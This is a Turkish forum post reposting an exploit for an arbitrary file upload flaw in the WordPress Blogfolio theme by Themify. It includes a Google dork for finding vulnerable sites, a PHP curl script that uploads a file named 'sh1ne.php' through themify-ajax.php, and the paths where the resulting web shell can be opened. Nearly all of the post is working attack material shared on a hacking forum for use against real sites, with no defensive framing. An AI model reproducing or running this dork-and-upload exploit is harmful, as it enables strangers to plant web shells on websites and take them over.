Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
20.01.2014 09:10
Title :WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
Author : eX-Sh1Ne
Date : 23/11/2013
Category : Web Applications
Type : PHP
Vendor : http://themify.me/
Download : http://themify.me/themes/blogfolio
Tested : Mozila, Chrome-> Windows
Vulnerabillity : Arbitrary File Upload
Dork :
PHP Kod:
inurl:wp-content/themes/blogfolio


Exploit:
Kod:
< ? p h p $uploadfile=”sh1ne.php”; $ch = curl_init(“http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1″); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>


Shell Access

PHP Kod:
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > find your shell 


Alinti



1 Ziyaretçi
[-]
Sponsor Reklam